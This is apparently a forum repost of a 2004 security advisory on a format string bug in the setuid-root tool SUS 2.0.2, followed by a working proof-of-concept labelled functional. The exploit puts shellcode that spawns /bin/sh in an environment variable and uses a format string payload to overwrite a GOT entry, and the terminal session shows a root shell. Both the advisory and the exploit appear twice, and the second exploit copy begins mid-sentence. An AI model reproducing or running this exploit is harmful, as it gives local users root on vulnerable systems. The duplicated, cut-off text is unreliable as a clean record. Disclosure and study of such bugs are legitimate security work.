Autor
Citar
---
Title : SUS 2.0.2 local root vulnerability
Advisory ID : LSS#2004-09-01
Date : September 14th, 2004
Advisory URL: : http://security.lss.hr/index.php?page=deta...=LSS-2004-09-01
Impact : Any user can obtain root privileges
Risk level : High
Vulnerability type : Local
Vendors contacted : GENTOO Linux and Peter D. Gray (SUS author), Contact date: September 13th, 2004
---
==[ Overview
SUS is a suid root program that allows ordinary users the execution of certain
programs with superuser privileges. SUS relatives are super, sudo and calife. SUS is
run by default as setuid root.
==[ Vulnerability
There is a very simple format string bug in log() function that allows any local
user to gain root privileges. Format string vulnerability is a result of an incorrect
syslog() function call, and can be exploited directly from the command line.
log.c:
--------
void
log(char * msg)
...
openlog(ident, LOG_PID|LOG_CONS, facility);
syslog(level,msg); // <- VULNERABILITY
...
--------
==[ Affected versions
The exploitation of this vulnerability was successfully tested on SUS version 2.0.2.
==[ Fix
GENTOO Linux has released a patched version - sus-2.0.2-r1.
There is also a fixed version on sus homepage:
http://pdg.uow.edu.au/sus/sus-2.0.6.tar.Z
==[ PoC Exploit
Proof of concept code can be downloaded at http://security.lss.hr/PoC/.
==[ Credits
This vulnerability was found by Leon Juranic (ljuranic@LSS.hr).
Title : SUS 2.0.2 local root vulnerability
Advisory ID : LSS#2004-09-01
Date : September 14th, 2004
Advisory URL: : http://security.lss.hr/index.php?page=deta...=LSS-2004-09-01
Impact : Any user can obtain root privileges
Risk level : High
Vulnerability type : Local
Vendors contacted : GENTOO Linux and Peter D. Gray (SUS author), Contact date: September 13th, 2004
---
==[ Overview
SUS is a suid root program that allows ordinary users the execution of certain
programs with superuser privileges. SUS relatives are super, sudo and calife. SUS is
run by default as setuid root.
==[ Vulnerability
There is a very simple format string bug in log() function that allows any local
user to gain root privileges. Format string vulnerability is a result of an incorrect
syslog() function call, and can be exploited directly from the command line.
log.c:
--------
void
log(char * msg)
...
openlog(ident, LOG_PID|LOG_CONS, facility);
syslog(level,msg); // <- VULNERABILITY
...
--------
==[ Affected versions
The exploitation of this vulnerability was successfully tested on SUS version 2.0.2.
==[ Fix
GENTOO Linux has released a patched version - sus-2.0.2-r1.
There is also a fixed version on sus homepage:
http://pdg.uow.edu.au/sus/sus-2.0.6.tar.Z
==[ PoC Exploit
Proof of concept code can be downloaded at http://security.lss.hr/PoC/.
==[ Credits
This vulnerability was found by Leon Juranic (ljuranic@LSS.hr).
Y PoC (Proof of Concept) FUNCIONAL:
Código:
In this PoC example, we will put shellcode in the HACK environment
variable, and overwrite GOT entry of getspnam() function with HACK address.
There are NOP opcodes in HACK variable, but in fact, they are not needed.
In the end, root shell is spawned.
getspnam() address -> 08061780
HACK variable address -> 0xbffffb54
[root@laptop root]# objdump -R /usr/bin/sus | grep getspnam
08061780 R_386_JUMP_SLOT getspnam
[root@laptop root]# su ljuranic
[ljuranic@laptop ljuranic]$ export HACK=`perl -e 'print "\x90" x 100; print
"\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53
\x89\xe1\xcd\x80"'`
[ljuranic@laptop ljuranic]$ ./env HACK
bffffb54
[ljuranic@laptop ljuranic]$ id
uid=500(ljuranic) gid=500(ljuranic) groups=500(ljuranic)
[ljuranic@laptop ljuranic]$ sus -V
Version 2.0.2
[ljuranic@laptop ljuranic]$ ls -al /usr/bin/sus
-rws--x--x 1 root root 126189 Jan 12 18:58 /usr/bin/sus
[ljuranic@laptop ljuranic]$ sus `perl -e 'print "B\x80\x17\x06\x08\x81\x17\x06
\x08\x82\x17\x06\x08\x83\x17\x06\x08A_____%.231u%257\\$n%.167u%258\\$n%.4u%259
\\$n%.192u%260\\$n"'`
sh-2.05a# id
uid=0(root) gid=0(root) groups=0(root)
sh-2.05a#
variable, and overwrite GOT entry of getspnam() function with HACK address.
There are NOP opcodes in HACK variable, but in fact, they are not needed.
In the end, root shell is spawned.
getspnam() address -> 08061780
HACK variable address -> 0xbffffb54
[root@laptop root]# objdump -R /usr/bin/sus | grep getspnam
08061780 R_386_JUMP_SLOT getspnam
[root@laptop root]# su ljuranic
[ljuranic@laptop ljuranic]$ export HACK=`perl -e 'print "\x90" x 100; print
"\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53
\x89\xe1\xcd\x80"'`
[ljuranic@laptop ljuranic]$ ./env HACK
bffffb54
[ljuranic@laptop ljuranic]$ id
uid=500(ljuranic) gid=500(ljuranic) groups=500(ljuranic)
[ljuranic@laptop ljuranic]$ sus -V
Version 2.0.2
[ljuranic@laptop ljuranic]$ ls -al /usr/bin/sus
-rws--x--x 1 root root 126189 Jan 12 18:58 /usr/bin/sus
[ljuranic@laptop ljuranic]$ sus `perl -e 'print "B\x80\x17\x06\x08\x81\x17\x06
\x08\x82\x17\x06\x08\x83\x17\x06\x08A_____%.231u%257\\$n%.167u%258\\$n%.4u%259
\\$n%.192u%260\\$n"'`
sh-2.05a# id
uid=0(root) gid=0(root) groups=0(root)
sh-2.05a#
En línea
